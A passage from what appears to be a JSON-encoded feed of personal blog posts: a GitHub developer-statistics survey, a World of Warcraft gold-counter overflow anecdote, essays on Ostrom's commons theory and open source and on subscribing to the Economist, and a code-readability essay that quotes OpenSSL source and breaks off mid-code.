checked out, giving me\nabout 55G of data to work with. The next step was to analyse the data,\nextracting commits, committers and line counts for each file type contained in\neach project. Lastly, I got rid of duplicate projects by looking for matching\ncommit hashes. From start to end, this process took more than a week to\ncomplete. The end result result is a database consisting of 3 400 repositories,\n20 000 authors, and 1.5 million commits. I'm releasing the dataset for others to\nplay with - see the bottom of this post for information.<\/p>\n<p>The rest of this post takes a basic look at the numbers for 12 languages. I had\nto leave some out for lack of data. Haskell, for example, didn't make the cut\nwith only 18 projects. Ah, well.<\/p>\n<p>Lets look at the numbers.<\/p>\n<h2 id=\"the-basics\">The Basics<\/h2>\n<p>Lets start with a quick overview of the basics of the dataset.<\/p>\n<div class=\"media\">\n    <a href=\"samplesize.png\">\n        <img src=\"samplesize.png\"  \/>\n    <\/a>\n\n    \n    <div class=\"subtitle\">\n        Sample size\n    <\/div>\n    \n<\/div>\n<p>First, the sample size. Clearly, github is very popular with the Ruby crowd,\nwith more than four times as many projects as Python, the runner-up. The sample\nsizes for C#, Erlang and Scala are pretty small, so the results for these\nlanguages aren't as firm as for the others.<\/p>\n<div class=\"media\">\n    <a href=\"median_contributors.png\">\n        <img src=\"median_contributors.png\"  \/>\n    <\/a>\n\n    \n    <div class=\"subtitle\">\n        Median contributors\n    <\/div>\n    \n<\/div>\n<p>This graph shows the median number of contributors to projects in each language.\nThe red line here and in the graphs below is the median for all projects in the\ndataset. <strong>Most projects have around 3 contributors, with Perl and Java projects\nhaving about 5, and Javascript and Objective C around 2<\/strong>.<\/p>\n<div class=\"media\">\n    <a href=\"median_commits.png\">\n        <img src=\"median_commits.png\"  \/>\n    <\/a>\n\n    \n    <div class=\"subtitle\">\n        Median commits\n    <\/div>\n    \n<\/div>\n<p>Here we see the median number of commits for projects in each language - in some\nsenses, we can view this as a proxy for project age. <strong>Most projects have around\n75 commits.<\/strong> The Perl and C++ data, however, seems significant - projects in\nthese languages on average have a much longer commit history. I suspect that\nthis is due to a decline in popularity in these languages. Recall that I\ncollected data only for projects that had recent commits. If fewer new projects\nare created in C++ and Perl, we would expect projects in these languages to be\nolder, on average.<\/p>\n<div class=\"media\">\n    <a href=\"median_commitsize.png\">\n        <img src=\"median_commitsize.png\"  \/>\n    <\/a>\n\n    \n    <div class=\"subtitle\">\n        Median commit size\n    <\/div>\n    \n<\/div>\n<p>This chart shows the median commit size, in lines of code. We take the total\ncommit size to be the sum of lines inserted and the lines deleted, as reported\nby \"git log --shortstat\". <strong>Most commits touch around 19 lines of code<\/strong>.  The\nC# outlier is probably due to the small sample set. I suspect that the\ndifferences in this graph are a reflection of basic language verbosity, with\nObjective C, C++ and Java being more verbose, and Perl, Python and Ruby being\nless so.<\/p>\n<div class=\"media\">\n    <a href=\"median_commit_files.png\">\n        <img src=\"median_commit_files.png\"  \/>\n    <\/a>\n\n    \n    <div class=\"subtitle\">\n        median files touched per commit\n    <\/div>\n    \n<\/div>\n<p><strong>Most commits touch about 4 files, with C++ touching somewhat more, and Perl,\nPython and Ruby somewhat less.<\/strong> The C# outlier is probably due to small sample\nsize.<\/p>\n<h2 id=\"the-contributors\">The Contributors<\/h2>\n<div class=\"media\">\n    <a href=\"median_commits_per_contributor.png\">\n        <img src=\"median_commits_per_contributor.png\"  \/>\n    <\/a>\n\n    \n    <div class=\"subtitle\">\n        Median commits per contributor\n    <\/div>\n    \n<\/div>\n<p>This shows the median number of commits contributors make. <strong> The average\ncontributor contributes about 5 commits to a project. C, Objective C and Ruby\ndevelopers contribute somewhat less, PHP, C#, Java and Javascript developers\nsomewhat more.<\/strong> I suspect the results for C and Ruby are due to\nprojects in these languages receiving more one-off contributions.<\/p>\n<p>An average of only 5 commits - that's not much. Lets look at this from a\ndifferent perspective - graphing the percentage of the total commits to a\nproject made by contributors.<\/p>\n<div class=\"media\">\n    <a href=\"author_commit_quantile.png\">\n        <img src=\"author_commit_quantile.png\"  \/>\n    <\/a>\n\n    \n    <div class=\"subtitle\">\n        % commits vs % contributors\n    <\/div>\n    \n<\/div>\n<p>The percentage of commits by contributors is shown on the Y axis, and the\nmatching f-value on the X axis. An f-value of 25 is the bottom\n<a rel=\"external\" href=\"http:\/\/en.wikipedia.org\/wiki\/Quartile\">quartile<\/a>, 50 is the median, and 75 is\nthe upper quartile. Looking at the Python graph, for example, we can see that\nthe bottom 75% of contributors provided a bit less than 20% of the commits. The\nshape of these graphs gives us our first take-away: <strong>For all languages, a small\nfraction of the committers do the vast majority of the work.<\/strong> This won't be\nnews to anyone in the Open Source community.  More interesting, though, is the\nfact that <strong>C, C++ and Perl projects are significantly more \"top-heavy\" than\nthose in other languages, with a smaller core of contributors doing more of the\nwork.<\/strong><\/p>\n<h2 id=\"how-projects-evolve\">How projects evolve<\/h2>\n<div class=\"media\">\n    <a href=\"contributorsXcommits.png\">\n        <img src=\"contributorsXcommits.png\"  \/>\n    <\/a>\n\n    \n    <div class=\"subtitle\">\n        Contributors vs Commits\n    <\/div>\n    \n<\/div>\n<p>This dot plot shows the total number of contributors vs the total number of\ncommits for each project. I've restricted the X and Y values - we're effectively\nlooking at the bottom-left corner of a larger dataset. The red line is a\n<a rel=\"external\" href=\"http:\/\/en.wikipedia.org\/wiki\/Local_regression\">loess<\/a> fitted curve. Over a\nlarge number of projects, we can consider the number of commits to be a measure\nof time - the graph effectively shows how quickly projects tend to accumulate\ncontributors over their lifespan. <strong>Ruby projects recruit contributors\nastoundingly well, with Python a close second. Java, Javascript and PHP\nprojects, on the other hand, do particularly badly.<\/strong> The fact that the fitted\ncurve is a nice straight line with a consistent slope shows that these results\nhold for young and old projects alike. Note that the Scala data is not\nsignificant - that nice straight line is an extrapolation by the curve fitting\nalgorithm, which is not backed up by information.<\/p>\n<div class=\"media\">\n    <a href=\"commit_age.png\">\n        <img src=\"commit_age.png\"  \/>\n    <\/a>\n\n    \n    <div class=\"subtitle\">\n        Commit age\n    <\/div>\n    \n<\/div>\n<p>This graph shows the number of commits per day, over the first 300 days of a\nproject's life. To prevent skew, I only included projects that are 300 days or\nolder. The red line is a smoothed curve. <strong>C and Perl projects show a marked\ndecline in activity over their first year.<\/strong> I suspect that the Perl result is\ndue to the fact that it becomes harder and harder to contribute to a Perl\ncodebase, the bigger it gets. The C result is more of a mystery.<\/p>\n<h2 id=\"the-silly\">The Silly<\/h2>\n<p>And now for something silly.<\/p>\n<div class=\"media\">\n    <a href=\"swearwords.png\">\n        <img src=\"swearwords.png\"  \/>\n    <\/a>\n\n    \n    <div class=\"subtitle\">\n        Swearwords per 1000 commits\n    <\/div>\n    \n<\/div>\n<p>This shows the number of swearwords used per 1000 commits. Objective C and Perl\nprogrammers are the most foul-mouthed. Java coders are more restrained, possibly\nbecause the language is more corporate, and they're afraid of having their pay\ndocked.<\/p>\n<h2 id=\"the-caveats\">The Caveats<\/h2>\n<p>There are all sorts of reasons why you should take all of this with a grain of\nsalt. There are many factors that make github projects atypical - not least of\nwhich is the use of Git for source control. The way that I collected data skews\nthe dataset in favor of projects with recent commits - unfortunately dead\nprojects aren't included. I detected a project's primary language purely based\non line count by file extension. Due to the large number of projects that\ninclude Javascript libraries in their repos wholesale, I had to apply a\nfudge-factor weighting to .js files to get reasonably sensible results.<\/p>\n<h2 id=\"you-can-play-too\">You can play too<\/h2>\n<p>I had fun playing with this dataset, and I've barely scratched the surface of\nwhat could be done with it. I'll probably squeeze another blog post or two out\nof the data, but in the meantime, I'm making the full database available so\npeople can point out the many mistakes and shortcomings of my analysis. At the\ntime of writing, I still have the checked out repositories, so if you have\nsuggestions for refinements or expansions to the data, let me know.<\/p>\n<p>You can check the database out <a rel=\"external\" href=\"http:\/\/github.com\/cortesi\/devsurvey\">here<\/a>. Be\nwarned, though - it's about 100mb of data.<\/p>\n"},{"title":"Overflowing World of Warcraft's gold counter","published":"2009-12-11T00:00:00+00:00","updated":"2009-12-11T00:00:00+00:00","link":{"@attributes":{"href":"https:\/\/corte.si\/posts\/wow\/beating-the-bank\/","type":"text\/html"}},"id":"https:\/\/corte.si\/posts\/wow\/beating-the-bank\/","content":"<div class=\"media\">\n    <a href=\"overflow.jpg\">\n        <img src=\"overflow.jpg\"  \/>\n    <\/a>\n\n    \n    <div class=\"subtitle\">\n        Bank Overflow\n    <\/div>\n    \n<\/div>\n<p>It's a little known fact, but my only vice... Well, one of my <em>few<\/em> vices...\nCough. <em>Amongst my vices<\/em> is the fact that I play <a rel=\"external\" href=\"http:\/\/www.worldofwarcraft.com\/\">World of\nWacraft<\/a> with a small group of real-life\nfriends. As WoW habits go, mine is a very mild one - I don't often have time to\nplay more than one night a week. On the one night I do have, I want to raid,\nnot grind for gold to service endless repair bills. Irked by my situation, I\ndid what any red-blooded programmer would do. I wrote some code to collect\ninformation on auction house price movements, analysed my data, and implemented\na Secret Trading Strategy in the form of a Super Secret Addon (which operates,\nof course, entirely within WoW's terms of service). This has been successful\nbeyond the wildest dreams of avarice - I spend about 5 minutes a day buying and\nselling the auctions recommended by the SSA, and I make enough to bankroll my\nentire guild.<\/p>\n<p>In fact, I just noticed that I have managed to overflow the \"Total gold\nacquired\" counter in my stats tab. Turns out that WoW stores this figure as a\n32-bit signed integer, expressed in copper. WoW now thinks I've earned\n-1981224360 copper in total, something that can be achieved by earing more than\n230 000 gold.<\/p>\n"},{"title":"Elinor Ostrom, the commons problem and Open Source","published":"2009-12-10T00:00:00+00:00","updated":"2009-12-10T00:00:00+00:00","link":{"@attributes":{"href":"https:\/\/corte.si\/posts\/opensource\/ostrom\/","type":"text\/html"}},"id":"https:\/\/corte.si\/posts\/opensource\/ostrom\/","content":"<div class=\"media\">\n    <a href=\"bigstump.jpg\">\n        <img src=\"bigstump.jpg\"  \/>\n    <\/a>\n\n    \n    <div class=\"subtitle\">\n        Logging in Tasmania\n    <\/div>\n    \n<\/div>\n<p>In 1968, <a rel=\"external\" href=\"http:\/\/en.wikipedia.org\/wiki\/Garrett_Hardin\">Garrett Hardin<\/a> coined\nthe term <a rel=\"external\" href=\"http:\/\/www.sciencemag.org\/cgi\/content\/full\/162\/3859\/1243\">\"Tragedy of the\nCommons\"<\/a> to describe\nthe economic mechanism that drives humans to destroy common resources.  The\ntragedy applies whenever a common resource is \"subtractable\" - that is, if use\nof a resource subtracts from it, making what's been extracted unavailable to\nothers. While the full benefit of appropriating the resource goes to the user,\nthe cost is shared among everyone. The consequence is that for a self-interested\nuser of the resource, the benefits of increasing use will always outweigh the\ncosts, even if the resource is ultimately destroyed in the process. Central to\nthis is the problem of freeloaders - even if the vast majority of users use a\nresource sustainably, a small number of opportunistic freeloaders can quickly\nsoak up the common benefit. The conventional economic view - first expressed by\nHardin himself - is that there are two ways to solve the commons problem:\nprivatising the resource so an owner with a direct interest can govern its use,\nor imposing regulation from \"outside\" the system. It's interesting to see, then,\nthat this year's Nobel Prize in Economics went to <a rel=\"external\" href=\"http:\/\/en.wikipedia.org\/wiki\/Elinor_Ostrom\">Elinor\nOstrom<\/a>, someone who has made a name\narguing against this fatalistic conclusion. Ostrom and her collaborators have\nproduced a huge literature studying commons that follow a third path -\nconsensual, self-generated governance that limits use to sustainable levels.<\/p>\n<p>At the heart of Ostrom's work is a simple question - how does self-governance\narise? She approaches this problem with a simple equation describing the\ncost-benefit analysis of an individual considering whether to participate in\ncommunal governance. I've modified it slightly for this post - you can find the\noriginal in the paper <a rel=\"external\" href=\"http:\/\/www.scielo.br\/pdf\/asoc\/n10\/16883.pdf\">\"Reformulating the\nCommons\"<\/a>:<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"plain\"><span class=\"giallo-l\"><span>BN &gt; BE + C<\/span><\/span><\/code><\/pre>\n<p><strong>BN<\/strong> is the benefit derived under a new (presumably communal) governance\nstrategy, <strong>BE<\/strong> is the benefit derived under the existing (presumably\nnon-communal) strategy, and <strong>C<\/strong> is the cost associated with switching. It's as\nsimple as that: the benefit of participating has to exceed the cost. In essence,\nOstrom's work on the commons explores the panoply of ways in which communities\nencourage participation in commons governance by modifying this equation through\nrewards, penalties and social norms. There's no single successful strategy, and\nthe ones that do work rely on concepts like trust, reciprocity, and the types of\ninstitutional structures and individuals involved. Additional complexity comes\nfrom the interactions between subsets of users - the equation can be different\nfor every user, and coalitions and factions are common. The huge diversity of\nsolutions means that Ostrom's work is dirtier and more empirical than much of\neconomics, and certainly far removed from the world of identical rational actors\nin Hardin's original analysis.<\/p>\n<p>It's interesting to consider how this line of thought applies to Open Source\nprojects. Software is not a classical <a rel=\"external\" href=\"http:\/\/en.wikipedia.org\/wiki\/Common_pool_resource\">common pool\nresource<\/a>, because it's not\nsubtractable - there's no cost to the users or developers of a project if I\nchoose to use it. Nonetheless, an Open Source project is definitely a commons,\nin the sense that it is a community resource that thrives or starves depending\non contributions from its members. The participants in this type of commons is\nthe pool of potential contributors, rather than the pool of potential\nappropriators. In the same way that using a common pool resource applies a\nshared penalty to everyone, a contribution to the software commons benefits\neveryone. This type of non-subtractive (additive?) commons has its own version\nof the freeloader problem - it pays for a contributor to hang back and wait for\nsomeone else to add a needed feature, rather than go to the expense of adding it\nthemselves. If the contributor is a company, it might be beneficial to maintain\na competitive advantage by not contributing a change back to the community, even\nif the work has already been done. Open Source projects face an inverted form of\nthe commons problem, which can be expressed in a modified version of Ostrom's\ncommons equation:<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"plain\"><span class=\"giallo-l\"><span>BC &gt; BN + C<\/span><\/span><\/code><\/pre>\n<p>Here, <strong>BC<\/strong> is the benefit of contributing, which has to outweigh the cost of\ncontributing (<strong>C<\/strong>) plus the benefit of not contributing (<strong>BN<\/strong>). The Open\nSource world has produced an immensely sophisticated set of norms and\ninstitutions around the terms of this equation, resulting in some of the most\nsuccessful self-governance structures on the planet. I'd argue that most of the\ninstitutional work in Open Source over the last few decades have focused on\nreducing <strong>C<\/strong> - a lot of the basic technology and accompanying social norms\nused in Open Source development (mailing lists, bug trackers, version control\nsystems, communications protocols) is lubrication to reduce the cost of\ncontributing. I think you could even make a plausible case that much of what\ndrives the Internet is just a side-effect of Open Source projects trying to\nreduce <strong>C<\/strong>.<\/p>\n<p>Another interesting train of thought is spurred by the factor <strong>BN<\/strong> - the\nbenefit of not contributing. This nicely illuminates the fundamental difference\nbetween commercial and individual contributors - for individual contributors\nwithout commercial interests, <strong>BN<\/strong> is almost always 0. For commercial\ncontributors, however, this term can be large. Consequently, we would expect\nprojects where commercial contribution is important to have measures that aim to\nreduce <strong>BN<\/strong> - penalties that minimise the benefit of not contributing to the\nproject. The outstanding example here is the Linux kernel project, which has\nfollowed a very successful two-fold path to reduce <strong>BN<\/strong>. The first, of course,\nis licensing - the GPL imposes stiff penalties (paid in terms of public outcry\nand possible legal consequences) on those failing to contribute code back to the\nproject under many circumstances. The terms of the GPL do not cover all types of\nuse, however, so there is a second tier of operational penalties for code that\nis license compliant, but not contributed back to the project. To quote <a rel=\"external\" href=\"http:\/\/en.wikipedia.org\/wiki\/Greg_Kroah-Hartman\">Greg\nKroah-Hartman<\/a> in a <a rel=\"external\" href=\"http:\/\/howsoftwareisbuilt.com\/2009\/11\/18\/interview-with-greg-kroah-hartman-linux-kernel-devmaintainer\/\">recent\ninterview<\/a>:<\/p>\n<blockquote>\n<p>Because of our huge rate of change, [drivers] pretty much have to be in the\nkernel tree. Otherwise, keeping a driver outside the kernel is technically a\nvery difficult thing to do, because our internal kernel APIs change very,\nvery rapidly.<\/p>\n<\/blockquote>\n<p>It's interesting to consider whether this last penalty is intentional or not.\nThere are good technical reasons not to make any stability guarantees for\ninternal APIs, but at the same time I'm sure that many kernel hackers are very\naware of the fact that a rapidly-changing internal API compels companies to\ncontribute code. I don't think it's a coincidence that the most successful Open\nSource project in the world has adopted strategies to penalize potential\ncontributors for not donating code to the community. Reducing <strong>BN<\/strong> is one of\nthe reasons why Linux has a vastly greater commercial contribution than, say,\nFreeBSD, and is therefore a much more vibrant and active project.<\/p>\n"},{"title":"Why I subscribe to the Economist","published":"2009-11-08T00:00:00+00:00","updated":"2009-11-08T00:00:00+00:00","link":{"@attributes":{"href":"https:\/\/corte.si\/posts\/media\/why-i-subscribe-to-the-economist\/","type":"text\/html"}},"id":"https:\/\/corte.si\/posts\/media\/why-i-subscribe-to-the-economist\/","content":"<p><div class=\"media\">\n    <a href=\"economist.jpg\">\n        <img src=\"economist.jpg\"  \/>\n    <\/a>\n\n    \n    <div class=\"subtitle\">\n        Economist\n    <\/div>\n    \n<\/div>\n<div class=\"media\">\n    <a href=\"guardian.jpg\">\n        <img src=\"guardian.jpg\"  \/>\n    <\/a>\n\n    \n    <div class=\"subtitle\">\n        Guardian\n    <\/div>\n    \n<\/div><\/p>\n<p>I've been a long-time reader of two international papers - the <a rel=\"external\" href=\"http:\/\/www.guardianweekly.co.uk\/\">Guardian\nWeekly<\/a> and the\n<a rel=\"external\" href=\"http:\/\/www.economist.com\/\">Economist<\/a>. Over the last year, these two papers\nhave had startlingly different performance results - the Guardian Media Group\nposted a record <a rel=\"external\" href=\"http:\/\/www.pressgazette.co.uk\/story.asp?storycode=44075\">loss of $150\nmillion<\/a> for the year\nending in June, while the Economist reported a record operating <a rel=\"external\" href=\"http:\/\/www.economistgroup.com\/our_news\/press_releases\/2009\/results_for_the_year_ended_march_31st_2009.html\">profit of $92\nmillion<\/a>\nin the year ending in March. I have played my own tiny part in producing this\noutcome.  I used to buy both the Economist and the Guardian Weekly religiously\nevery week - today, I'm a paid-up subscriber to the Economist, and no longer buy\nthe Guardian at all.  So, how did the Guardian lose my dime entirely, while The\nEconomist converted me from a news-stand purchaser to a subscriber? The answer\nto the first part of the question is simple: I no longer buy the Guardian Weekly\nbecause most of their content is available on the <a rel=\"external\" href=\"http:\/\/www.guardian.co.uk\">Guardian\nwebsite<\/a> for free (even the crosswords, which I still\nprint out and do over breakfast). I just have no incentive to fork out money for\na piece of paper containing articles I've already read. The Economist has played\nthe game rather more cleverly.  Editorial pieces that are likely to generate\ninbound links are released for free on their website, but the bulk of their\nfactual reporting remained behind a paywall. This alone would not have been\nenough to induce me to part with my hard-earned doubloons - if they stopped\nthere, I would probably just have switched to free (though probably lower\nquality) alternatives. They really hooked me by offering a complete,\nprofessionally read audio edition, delivered promptly through an RSS feed at the\nsame time as the print edition.  This means that my subscription buys me about 8\nhours of excellent audio content every week.  By contrast, the rather quaint\nperk I would receive if I subscribed to the Guardian Weekly is a \"digital paper\"\nedition - essentially a series of large zoom-able images of the laid-out paper\nthat I can't cut and paste from, link to, or even read comfortably.<\/p>\n<p>There's been a fair bit of head-scratching by pundits trying to explain The\nEconomist's unexpected success. Michael Hirschorn from the Atlantic <a rel=\"external\" href=\"http:\/\/www.theatlantic.com\/doc\/200907\/news-magazines\">just seems\nterribly confused<\/a>,\nclaiming that the Economist \"has never had much digital savvy\", and concluding\ninexplicably that it must all just be luck. <a rel=\"external\" href=\"http:\/\/www.niemanlab.org\/2009\/09\/clay-shirky-let-a-thousand-flowers-bloom-to-replace-newspapers-dont-build-a-paywall-around-a-public-good\/\">Clay Shirkey\nthinks<\/a>\nthat the Economist is a niche financial news publication, and that its audience\nof \"traders and business people\" are willing to pay for specialist content when\nother people are not.  Both of these opinions are quite wrong. The Economist has\nplayed a cunning strategic game with considerable <em>sang-froid<\/em>, and has shown\nmuch more savvy in producing monetizable online material than the Guardian (or\nindeed the Atlantic). Despite its name the Economist is in fact a\ngeneral-interest international newspaper, with much more space devoted to news\nand politics than business and economics. The real answer is, I think, somewhat\nsimpler: the Economist didn't abandon the basic rules of business - exchanging\nsomething of value for currency - when they moved online.<\/p>\n<p>All of this reminds me of a recent blog post by <a rel=\"external\" href=\"http:\/\/blog.amandapalmer.net\/post\/200582690\/why-i-am-not-afraid-to-take-your-money-by-amanda\">Amanda\nPalmer<\/a>,\nlead singer for the Dresden Dolls. She's fairly well known for shamelessly\nmonetizing her fanbase, an attitude she says has roots in her past as a street\nperformer. She makes a convincing case that artists have historically been\ninsulated by record companies from actually having to ask their fans for money.\nPutting your hat out and asking for coins is seen as grubby - an attitude that\nis going to have to change as record companies exit stage left and the\nconnection between performers and audiences becomes more direct. A somewhat\nanalogous thing is now happening to many news publishers - the most obvious\nalternative to selling eyeballs to advertisers is to put on a good show, and ask\nyour audience for money. In my case, that's exactly what the Economist did -\nthey offered me a distinctive benefit, and asked me to pay for it. And,\napparently like many other Economist subscribers, I was happy to.<\/p>\n"},{"title":"Reading Code: In praise of superficial beauty","published":"2009-11-04T00:00:00+00:00","updated":"2009-11-04T00:00:00+00:00","link":{"@attributes":{"href":"https:\/\/corte.si\/posts\/code\/reading-code\/","type":"text\/html"}},"id":"https:\/\/corte.si\/posts\/code\/reading-code\/","content":"<p>Every good programmer has gone through this. You discover a new tool, and it\nseems shapely and fit for purpose. You start using it, tentatively at first,\ngradually getting more and more used to its quirks and features. Over time,\ntrust between you grows, and your casual friendship blossoms into something\ndeeper. The program becomes part of that sacred subset of utilities you can't\nimagine yourself without. All is bliss... Then, one day, you decide to look at\nthe code.  Maybe you want to extend it, maybe you're just curious. The moment\nyou fire up your editor on the first source file, you sense that something is\nwrong.  Without reading a line, you notice a certain visual complexity to the\ncode - something to do with deeply nested and over-long functions. Looking\ncloser, you quickly realise that tangles of ifdefs snake through the source like\na canker. Weird indentation and non-idiomatic constructs are everywhere. The\nproject's structure sucks - there's no proper component isolation, its innards\nare a nest of subtle and devious co-dependencies. Beneath the skin of the\nstreamlined program you thought you were using lies a grotesque, bloated,\nunmaintainable monstrosity. You're heartbroken - you've trusted this tool for\nyears, and now it betrays you like this. It was all a lie - nothing will ever be\nthe same again...<\/p>\n<p>I know from personal experience that this is a very traumatic process, so it's\nwith great sympathy that I read a recent article by Marco Peereboom - an\nvocative and haunting lament with the poetic title <a rel=\"external\" href=\"http:\/\/www.peereboom.us\/assl\/html\/openssl.html\">\"OpenSSL is written by\nmonkeys\"<\/a>. Marco modestly\nclaims not to be a great programmer, but he <em>is<\/em> a contributor to OpenBSD, a\nproject that has a frankly\n<a rel=\"external\" href=\"http:\/\/en.wikipedia.org\/wiki\/Theo_de_Raadt\">psychotic<\/a> focus on code quality.\nSo, lets see what a graduate of the OpenBSD Academy of Programming makes of the\nOpenSSL codebase, as illustrated by this illuminating extract:<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"c\"><span class=\"giallo-l\"><span style=\"color: #D73A49;\">#ifndef<\/span><span style=\"color: #6F42C1;\"> OPENSSL_NO_STDIO<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #6A737D;\">\/*!<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #6A737D;\"> * Load CA certs from a file into a ::STACK. Note that it is somewhat misnamed;<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #6A737D;\"> * it doesn&#39;t really have anything to do with clients (except that a common use<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #6A737D;\"> * for a stack of CAs is to send it to the client). Actually, it doesn&#39;t have<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #6A737D;\"> * much to do with CAs, either, since it will load any old cert.<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #6A737D;\"> * <\/span><span style=\"color: #D73A49;\">\\param<\/span><span style=\"color: #E36209;\"> file<\/span><span style=\"color: #6A737D;\"> the file containing one or more certs.<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #6A737D;\"> * <\/span><span style=\"color: #D73A49;\">\\return<\/span><span style=\"color: #6A737D;\"> a ::STACK containing the certs.<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #6A737D;\"> *\/<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #6F42C1;\">STACK_OF<\/span><span>(X509_NAME)<\/span><span style=\"color: #D73A49;\"> *<\/span><span style=\"color: #6F42C1;\">SSL_load_client_CA_file<\/span><span>(<\/span><span style=\"color: #D73A49;\">const char *<\/span><span style=\"color: #E36209;\">file<\/span><span>)<\/span><\/span>\n<span class=\"giallo-l\"><span>    {<\/span><\/span>\n<span class=\"giallo-l\"><span>    BIO <\/span><span style=\"color: #D73A49;\">*<\/span><span>in;<\/span><\/span>\n<span class=\"giallo-l\"><span>    X509 <\/span><span style=\"color: #D73A49;\">*<\/span><span>x<\/span><span style=\"color: #D73A49;\">=<\/span><span style=\"color: #005CC5;\">NULL<\/span><span>;<\/span><\/span>\n<span class=\"giallo-l\"><span>    X509_NAME <\/span><span style=\"color: #D73A49;\">*<\/span><span>xn<\/span><span style=\"color: #D73A49;\">=<\/span><span style=\"color: #005CC5;\">NULL<\/span><span>;<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #6F42C1;\">    STACK_OF<\/span><span>(X509_NAME)<\/span><span style=\"color: #D73A49;\"> *<\/span><span>ret <\/span><span style=\"color: #D73A49;\">=<\/span><span style=\"color: #005CC5;\"> NULL<\/span><span>,<\/span><span style=\"color: #D73A49;\">*<\/span><span>sk;<\/span><\/span>\n<span class=\"giallo-l\"><\/span>\n<span class=\"giallo-l\"><span>    sk<\/span><span style=\"color: #D73A49;\">=<\/span><span style=\"color: #6F42C1;\">sk_X509_NAME_new<\/span><span>(xname_cmp);<\/span><\/span>\n<span class=\"giallo-l\"><\/span>\n<span class=\"giallo-l\"><span>    in<\/span><span style=\"color: #D73A49;\">=<\/span><span style=\"color: #6F42C1;\">BIO_new<\/span><span>(<\/span><span style=\"color: #6F42C1;\">BIO_s_file_internal<\/span><span>());<\/span><\/span>\n<span class=\"giallo-l\"><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">    if<\/span><span> ((sk <\/span><span style=\"color: #D73A49;\">==<\/span><span style=\"color: #005CC5;\"> NULL<\/span><span>)<\/span><span style=\"color: #D73A49;\"> ||<\/span><span> (in <\/span><span style=\"color: #D73A49;\">==<\/span><span style=\"color: #005CC5;\"> NULL<\/span><span>))<\/span><\/span>\n<span class=\"giallo-l\"><span>        {<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #6F42C1;\">        SSLerr<\/span><span>(SSL_F_SSL_LOAD_CLIENT_CA_FILE,ERR_R_MALLOC_FAILURE);<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">        goto<\/span><span> err;<\/span><\/span>\n<span class=\"giallo-l\"><span>        }<\/span><\/span>\n<span class=\"giallo-l\"><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">    if<\/span><span> (<\/span><span style=\"color: #D73A49;\">!<\/span><span style=\"color: #6F42C1;\">BIO_read_filename<\/span><span>(in,file))<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">        goto<\/span><span> err;<\/span><\/span>\n<span class=\"giallo-l\"><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">    for<\/span><span> (;;)<\/span><\/span>\n<span class=\"giallo-l\"><span>        {<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">        if<\/span><span> (<\/span><span style=\"color: #6F42C1;\">PEM_read_bio_X509<\/span><span>(in,<\/span><span style=\"color: #D73A49;\">&amp;<\/span><span>x,<\/span><span style=\"color: #005CC5;\">NULL<\/span><span>,<\/span><span style=\"color: #005CC5;\">NULL<\/span><span>)<\/span><span style=\"color: #D73A49;\"> ==<\/span><span style=\"color: #005CC5;\"> NULL<\/span><span>)<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">            break<\/span><span>;<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">        if<\/span><span> (ret <\/span><span style=\"color: #D73A49;\">==<\/span><span style=\"color: #005CC5;\"> NULL<\/span><span>)<\/span><\/span>\n<span class=\"giallo-l\"><span>            {<\/span><\/span>\n<span class=\"giallo-l\"><span>            ret <\/span><span style=\"color: #D73A49;\">=<\/span><span style=\"color: #6F42C1;\"> sk_X509_NAME_new_null<\/span><span>();<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">            if<\/span><span> (ret <\/span><span style=\"color: #D73A49;\">==<\/span><span style=\"color: #005CC5;\"> NULL<\/span><span>)<\/span><\/span>\n<span class=\"giallo-l\"><span>                {<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #6F42C1;\">                SSLerr<\/span><span>(SSL_F_SSL_LOAD_CLIENT_CA_FILE,ERR_R_MALLOC_FAILURE);<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">                goto<\/span><span> err;<\/span><\/span>\n<span class=\"giallo-l\"><span>                }<\/span><\/span>\n<span class=\"giallo-l\"><span>            }<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">        if<\/span><span> ((xn<\/span><span style=\"color: #D73A49;\">=<\/span><span style=\"color: #6F42C1;\">X509_get_subject_name<\/span><span>(x))<\/span><span style=\"color: #D73A49;\"> ==<\/span><span style=\"color: #005CC5;\"> NULL<\/span><span>)<\/span><span style=\"color: #D73A49;\"> goto<\/span><span> err;<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #6A737D;\">        \/* check for duplicates *\/<\/span><\/span>\n<span class=\"giallo-l\"><span>        xn<\/span><span style=\"color: #D73A49;\">=<\/span><span style=\"color: #6F42C1;\">X509_NAME_dup<\/span><span>(xn);<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">        if<\/span><span> (xn <\/span><span style=\"color: #D73A49;\">==<\/span><span style=\"color: #005CC5;\"> NULL<\/span><span>)<\/span><span style=\"color: #D73A49;\"> goto<\/span><span> err;<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">        if<\/span><span> (<\/span><span style=\"color: 